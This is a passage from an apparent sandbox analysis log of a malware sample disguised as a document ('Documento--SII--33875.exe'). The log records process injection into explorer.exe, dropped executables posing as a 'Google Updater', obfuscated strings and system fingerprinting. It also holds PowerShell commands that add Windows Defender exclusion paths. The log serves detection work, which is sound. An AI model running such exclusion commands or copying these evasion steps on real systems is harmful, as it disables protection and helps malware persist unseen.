                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 47881F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3CA81F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 43081F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3C481F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3C081F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 38781F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3F081F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 40081F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 3D081F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 41981F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 45A81F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 41381F3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe base: 77A077F0
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                      Source: C:\Windows\SysWOW64\explorer.exeProcess created: unknown unknown
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: unknown unknown
                      Source: Documento--SII--33875.exe, 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, explorer.exe, 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: DownloadVersionListSoftware\Microsoft\Internet Explorer\VersionManager%LOCALAPPDATA%\Microsoft\Internet Explorer\VersionManager\versionlist.xml11.0Shell_TrayWnd%s\%sNT AUTHORITYSYSTEM\mscoree.dllrunasopenCreateProcessInternalWntdll.dll/%sSOFTWARE\Microsoft\NET Framework Setup\NDP ,, jarfile\shell\open\commandSYSTEM\CurrentControlSetZwMapUserPhysicalPagesScatterZwWow64CallFunction64ZwWaitHighEventPairbf'J&';qyy4RpaTqqg\{szPmBbf'J&';qyy4RpaTqqg\{szBfsvJzf;qyy4Fsv\fS|ypEgzapvapqzyp&';qyy4F]Vgptap\apxSgzxEtgf|{r[txp{vglea;qyy4FfyP{vgleaEtv~pafpv`g&';qyy4P{vgleaXpfftrpb|{ag`fa;qyy4B|{Cpg|slAg`fa{pate|&';qyy4[pa@fpgRpa\{sz`gyxz{;qyy4@GYQzb{yztqAzS|ypB`gyxz{;qyy4Zwat|{@fpgTrp{aFag|{rvzxvay&';qyy4Atf~Q|tyzr\{q|gpvatqcte|&';qyy4VgptapEgzvpffB|a}Az~p{B`fpg&';qyy4V}t{rpB|{qzbXpfftrpS|yapg~pg{py&';qyy4@eqtapEgzvA}gptqTaag|w`ap~pg{py&';qyy4\{|a|ty|opEgzvA}gptqTaag|w`apY|fa~pg{py&';qyy4VgptapEgzvpff\{apg{tyB~pg{py&';qyy4RpaA}gptq\q~pg{py&';qyy4RpaXteepqS|yp[txpB~pg{py&';qyy4RpaEgzq`va\{sz{aqyy;qyy4GayD`pglPypcta|z{Sytrf{aqyy;qyy4bvffag{aqyy;qyy4xpxvel{aqyy;qyy4xpxfpa{aqyy;qyy4GayFpaP{c|gz{xp{aCtg|twyp{aqyy;qyy4GayD`pglP{c|gz{xp{aCtg|twypJ@{aqyy;qyy4GayD`pglP{c|gz{xp{aCtg|twyp{aqyy;qyy4GayFpaP{c|gz{xp{aCtg{aqyy;qyy4QwrWgpt~Ez|{a{aqyy;qyy4Qwr@|RpaA}gptqQpw`rZw
                      Source: CpSHySoEfzH.exe, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                      Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: explorer.exe, 00000003.00000002.524746567.0000000003190000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000000.243151920.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.520696944.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.522565820.0000000002280000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000000.253248496.0000000002700000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000000.260714356.00000000026C0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.530024248.0000000002330000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.510976724.0000000001E80000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.512551787.0000000001EC0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000000.277667134.0000000001AE0000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.514386186.0000000002010000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000000.285832590.0000000002460000.00000002.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.501226750.0000000001F20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,MultiByteToWideChar,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: GetLocaleInfoW,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,MultiByteToWideChar,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: EnumSystemLocalesA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: GetLocaleInfoA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: GetLocaleInfoW,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: EnumSystemLocalesA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: GetLocaleInfoA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: GetLocaleInfoA,
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
